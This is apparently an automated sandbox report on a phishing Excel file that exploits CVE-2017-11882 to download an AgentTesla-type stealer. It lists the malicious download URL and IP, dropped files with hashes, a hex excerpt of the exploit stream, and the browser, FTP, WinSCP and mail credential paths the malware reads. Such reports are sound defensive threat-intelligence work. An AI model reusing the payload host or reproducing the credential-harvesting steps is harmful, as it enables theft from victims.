Source: Yara match	File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.622128316.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000006.00000002.622210442.0000000002001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3688, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.622128316.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	121 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	33 Exploitation for Client Execution	1 DLL Side-Loading	212 Process Injection	1 Obfuscated Files or Information	1 Credentials in Registry	124 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Install Root Certificate	Security Account Manager	31 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	12 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Modify Registry	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	212 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Fatura 002.xlam.xlsx	51%	Virustotal		Browse
Fatura 002.xlam.xlsx	71%	ReversingLabs	Document-Office.Exploit.CVE-2017-11882
Fatura 002.xlam.xlsx	100%	Avira	EXP/CVE-2017-11882.Gen

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\coolz.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe	26%	ReversingLabs	Win32.Trojan.Autoitinject
C:\Users\user\AppData\Local\Temp\coolz.exe	26%	ReversingLabs	Win32.Trojan.Autoitinject

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
menyos.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	Virustotal		Browse
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	Virustotal		Browse
http://crl.entrust.net/server1.crl0	0%	Virustotal		Browse
http://www.diginotar.nl/cps/pkioverheid0	0%	Virustotal		Browse
https://secure.comodo.com/CPS0	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
menyos.com	104.21.35.109	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://menyos.com/assets/home/js/bdg/food.exe	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://menyos.com/assets/home/js/bdg/food.exeiiC:	EQNEDT32.EXE, 00000002.00000002.473266370.000000000054F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://crl.entrust.net/server1.crl0	EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://menyos.com/assets/home/js/bdg/food.exeC:	EQNEDT32.EXE, 00000002.00000003.473039070.000000000058E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.473291356.000000000058E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ocsp.entrust.net03	EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://menyos.com/5m/	EQNEDT32.EXE, 00000002.00000003.473039070.000000000058E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.473291356.000000000058E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://menyos.com/assets/home/js/bdg/food.exeuj	EQNEDT32.EXE, 00000002.00000002.473266370.000000000054F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://menyos.com//m/	EQNEDT32.EXE, 00000002.00000003.473039070.000000000058E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.473291356.000000000058E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.diginotar.nl/cps/pkioverheid0	EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://ocsp.entrust.net0D	EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://secure.comodo.com/CPS0	EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://menyos.com/assets/home/js/bdg/food.exefj	EQNEDT32.EXE, 00000002.00000002.473266370.000000000054F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://menyos.com/assets/home/js/bdg/food.exej	EQNEDT32.EXE, 00000002.00000002.473765662.0000000003670000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.entrust.net/2048ca.crl0	EQNEDT32.EXE, 00000002.00000002.473317377.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.473013254.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.35.109	menyos.com	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523149
Start date and time:	2024-10-01 07:43:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Fatura 002.xlam.xlsx
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winXLSX@6/5@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 92% Number of executed functions: 71 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
Execution Graph export aborted for target RegSvcs.exe, PID 3688 because it is empty
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:44:54	API Interceptor	99x Sleep call for process: EQNEDT32.EXE modified
01:45:04	API Interceptor	229x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.35.109	http://gsmgoodssk.life	Get hash	malicious	Unknown	Browse
104.21.35.109	phish_alert_iocp_v1.4.48 (5).eml	Get hash	malicious	HTMLPhisher	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Payment proof.xls	Get hash	malicious	Remcos	Browse	172.67.216.244
	46L03o2EOY.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	TT12822024.xls	Get hash	malicious	Remcos	Browse	172.67.216.244
	2zYP8qOYmJ.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	RFQ-00032035.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	AE1169-0106202.xls	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	6JA2YPtbeB.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.84.213
	46L03o2EOY.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	hTR7xY0d0V.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.1.169
	N83LFtMTUS.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.1.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
7dcce5b76c8b17472d024758970a406b	Payment proof.xls	Get hash	malicious	Remcos	Browse	104.21.35.109
	TT12822024.xls	Get hash	malicious	Remcos	Browse	104.21.35.109
	AE1169-0106202.xls	Get hash	malicious	Snake Keylogger	Browse	104.21.35.109
	AMG Cargo Logistic.docx	Get hash	malicious	Remcos	Browse	104.21.35.109
	factura proforma .docx.doc	Get hash	malicious	Remcos	Browse	104.21.35.109
	PI#0034250924.xla.xlsx	Get hash	malicious	FormBook	Browse	104.21.35.109
	PO554830092024.xls	Get hash	malicious	Unknown	Browse	104.21.35.109
	SYSN ORDER.xls	Get hash	malicious	Snake Keylogger	Browse	104.21.35.109
	PO554830092024.xls	Get hash	malicious	Unknown	Browse	104.21.35.109
	PI#0034250924.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.35.109

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1179411
Entropy (8bit):	7.236668970589268
Encrypted:	false
SSDEEP:	24576:JfmMv6Ckr7Mny5QN39deoG/4QnEWxTULNgGL/YG:J3v+7/5QNtdeo/QDUNgGjr
MD5:	0FCFEEFEF9E389286B0EF7E97E1E7F28
SHA1:	85986DADC140D6D719B844E6F38D775DFAD211D5
SHA-256:	C186DEF00D97AABDF95CF1BBD2605EF8FFC8A05E13FFF501B0117AE7395D4487
SHA-512:	E64A173AEF6F91D03BA26762EE176B32E50E9344D1CF473DBDD22949C067A0E4B9354F7ECFC742AFA6FC53ED67809E1DD7B599F8FBE596DC797D616063E7ED19
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 26%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i.i.i..9.k.`.:.w.`.,...`.+.P.N%.c.N%.H.i.d.`. ./.w.:.k.w.;.h.i.8.h.`.>.h.Richi.........................PE..L.....K..........#..................c....... ....@..........................p......5!........@.......@.....................<...T.................................................................................... ..@............................text............................... ..`.rdata..\.... ......................@..@.data............h..................@....rsrc................H..............@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\coolz.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1179411
Entropy (8bit):	7.236668970589268
Encrypted:	false
SSDEEP:	24576:JfmMv6Ckr7Mny5QN39deoG/4QnEWxTULNgGL/YG:J3v+7/5QNtdeo/QDUNgGjr
MD5:	0FCFEEFEF9E389286B0EF7E97E1E7F28
SHA1:	85986DADC140D6D719B844E6F38D775DFAD211D5
SHA-256:	C186DEF00D97AABDF95CF1BBD2605EF8FFC8A05E13FFF501B0117AE7395D4487
SHA-512:	E64A173AEF6F91D03BA26762EE176B32E50E9344D1CF473DBDD22949C067A0E4B9354F7ECFC742AFA6FC53ED67809E1DD7B599F8FBE596DC797D616063E7ED19
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 26%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i.i.i..9.k.`.:.w.`.,...`.+.P.N%.c.N%.H.i.d.`. ./.w.:.k.w.;.h.i.8.h.`.>.h.Richi.........................PE..L.....K..........#..................c....... ....@..........................p......5!........@.......@.....................<...T.................................................................................... ..@............................text............................... ..`.rdata..\.... ......................@..@.data............h..................@....rsrc................H..............@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\prespecialist

Download File

Process:	C:\Users\user\AppData\Local\Temp\coolz.exe
File Type:	data
Category:	dropped
Size (bytes):	168448
Entropy (8bit):	7.011746219514673
Encrypted:	false
SSDEEP:	3072:5gdS6dizIF4bXeIy8RYIx1+IAr0x0rUpGzp8B0AdXqpnNhnbwBJSOAtNJ:5gk6oIF4bO8Rpn8zpU0Ad6pnNhnb6ADJ
MD5:	67BFE1B318F14BB23F9EC813672E74BA
SHA1:	2E2070091AEF4247C297AFC3F57F7EF3BD42DB1E
SHA-256:	ABEC001525336B8D15840F6E9A93B0B6D3C27D020AD3F18B5091D9585B57F8C3
SHA-512:	B59B6B1EBBCAA164579B0D3287276F4B6EEA23038001ECB68708BDC35B8B6F539917A287D2F6A3F9539C475E0C725732EA907D915F814013F060339932EF52B7
Malicious:	false
Reputation:	low
Preview:	...WK8XOK8N7..HN.0LFNDDH.MBMADXHBWH8XOO8N7YNHNU0LFNDDHZMBMAD.HBWF'.AO.G.x.I.....'7d8("%? )x+#9&W,o-]nE, h';....d)'>(l@LN\|HBWH8XO.}N7.OKN..."NDDHZMBM.DZIIVx8X.M8N?YNHNU0..LDDhZMBMADXH.WH.XOO:N7]NHNU0LFJDDHZMBMAD[HBUH8XOO8L7..HNE0LVNDDHJMB]ADXHBWX8XOO8N7YNHN.NF.DDHZ.@M.AXHBWH8XOO8N7YNHNU0L.LDHHZMBMADXHBWH8XOO8N7YNHNU0LFNDDHZMBMADXHBWH8XOO8N7YNHnU0DFNDDHZMBMADPhBW.8XOO8N7YNHN{D)>:DDH..@MAdXHB.J8XMO8N7YNHNU0LFNDdHZ-l?26;HBW.=XOO.L7YHHNU.NFNDDHZMBMADXH.WHxv=*T!TYNDNU0L.LDDJZMB.CDXHBWH8XOO8N7.NH.U0LFNDDHZMBMADXH..J8XOO8.7YNJNP0.OLD..ZMAMADYHBQH8XOO8N7YNHNU0LFNDDHZMBMADXHBWH8XOO8N7YNHNU0LFNDWxXM.MADYHBF^2s.O>W.XbOfT0LLTNDNB.CaFl[HBQQ2XIX.O.Un.AU0dDNDNPPMD[.EtKB@B8^U.9b5rLc...NnJDDBpMBMBtZH.WH8YOO)X=a.HNU0J^.EhOrL@MG]RHDJ.9tC19N7]!.NU6RLNB_.[aK3LDXLn5T2XIP2.6uC6LU0H).DDNEFHMG[Q.C{EK.OO>.5YNLQ_:L@R.EdV>.MAB.IBWL%ROI!.6uI`fU0J\DDBR.LnJiBXHDLB8^Q.9b='@HNQ.fYGNDNM.CaFlSHBQP2XIY.O.ZN_DU6SM.EhJqHzs...bBW[.\Oq8N7XNH_C:gqNBS.[a_m..HYj6J8^gF8N1qIHNS2[nGFDNBGBKW.YdAW_2XIW.O.[eJe..LFUtAH.MBMCDXYTZc.XFX.

C:\Users\user\Desktop\~$Fatura 002.xlam.xls

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\Desktop\~$Fatura 002.xlam.xlsx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	true
Reputation:	high, very likely benign file
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:	Microsoft Excel 2007+
Entropy (8bit):	7.997856307539723
TrID:	Excel Microsoft Office Open XML Format document (35004/1) 81.40% ZIP compressed archive (8000/1) 18.60%
File name:	Fatura 002.xlam.xlsx
File size:	706'949 bytes
MD5:	404eec23afb533475c11493f7d367ec0
SHA1:	844ba233d3ba4ecc44596bc78f90eecffd0286de
SHA256:	eab869eef3b586266919e8d303d196beeb0f22d3f3cbc7b1f521a7e67acd4cf5
SHA512:	a44c6f824fee4dde24a37d9671bea3f621e734d05e3617cd29d7de7a350642868a03d054c9f30c989b73369b28cda661bc239d91356c054f34ab2fbdf998af4e
SSDEEP:	12288:FyeyA+762GP2WtqK6PkE9AbE6zFNmeS1DZ5RRvb55dwdlnu3vAb9oFTEYhQ/mqG:FyRr702PVQEaFNmeYDZ5RRvEkAb9ITAQ
TLSH:	3AE423CFB189C96DE9E7ACDB913A60C0444991722BD6DD286D0EBC3B9C8C7FC4C96548
File Content Preview:	PK..........=YLP......B.......[Content_Types].xmlUT...j..fj..fj..f..MO.1......+_...U...p...T.?.kO....3$...........].g....g=...oVP....39..D....N.y.k/D....>E...P\].\|.>m2`....X...J.Y@.(S...Y*A......,....d.C...".T=....f..Ss;......Es.M..N...3.8.V........1....)

File Icon


Icon Hash:	2562ab89a7b7bfbf

Static OLE Info

General

Document Type:	OpenXML
Number of OLE Files:	1

OLE File "Fatura 002.xlam.xlsx"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	False

Summary

Author:	USER
Last Saved By:	USER
Create Time:	2023-08-03T11:34:29Z
Last Saved Time:	2023-08-03T11:37:28Z
Creating Application:	Microsoft Excel
Security:	0

Document Summary

Thumbnail Scaling Desired:	false
Company:
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	16.0300

Streams

Stream Path: \x1ole10NaTiVE, File Type: data, Stream Size: 986295

General
Stream Path:	\x1ole10NaTiVE
CLSID:
File Type:	data
Stream Size:	986295
Entropy:	5.941350794618656
Base64 Encoded:	False
Data ASCII:	V ( . . . . . . . B . E . . . . . I . R . q - . . l \\ A . , = _ Q [ 4 . 0 M M N . . c . = ' # . * < < O . * . . X . . h & Q * . . 7 6 r 1 y V n n . \\ . O . . O . < . v q U . } # . ( { o J $ e . Y 7 6 : c . . . . e . < \| l . B . , / n b h . x K q . f . . . K < o e . Z . . E . S " . S Q Q . w [ Y , ~ i . [ . l z { . M z ? L { @ & M . . x i n . b . ? . b O . . ( . ( . 9 / $ K . 7 F U V ) ^ m N W . . i . = > . . E 7 . d . r e > % i / . r . . b . a z . } \| w P . 3 " 6 n . v H K ' . \\ . . b 5 t u U . & J s W
Data Raw:	56 28 e6 02 03 12 95 c2 94 a3 01 08 1f a0 bd cb 42 ba ff f7 d5 8b 45 08 8b 10 bf 1e d6 fc 1c 81 c7 92 91 49 e3 8b 07 52 ff d0 05 71 9d db f6 2d b3 9c db f6 ff e0 0f ce b4 6c a2 5c 41 00 2c b3 91 3d 5f 51 aa 5b d4 34 82 89 07 30 4d 4d 8c 4e 15 06 ef c3 ef a3 63 7f 3d 27 23 06 c8 2a 3c 3c 4f c6 06 f4 bb 2a 04 d1 e4 bb 90 58 06 14 68 26 51 2a 94 e6 07 05 b2 37 9d b8 9e 36 fd 9a 9d 72

Stream Path: eI7Zr, File Type: empty, Stream Size: 0

General
Stream Path:	eI7Zr
CLSID:
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 07:44:58.391043901 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:58.391114950 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:58.391201019 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:58.401035070 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:58.401070118 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:58.878812075 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:58.878907919 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:58.885626078 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:58.885675907 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:58.886039972 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:58.886106968 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:58.956810951 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:58.999437094 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.061913013 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.062066078 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.062114954 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.062182903 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.062196016 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.062251091 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.062262058 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.062315941 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.062336922 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.062408924 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.062437057 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.062491894 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.062537909 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.062592030 CEST	49163	443	192.168.2.22	104.21.35.109
Oct 1, 2024 07:44:59.062635899 CEST	443	49163	104.21.35.109	192.168.2.22
Oct 1, 2024 07:44:59.062690973 CEST	49163	443	192.168.2.22	104.21.35.109
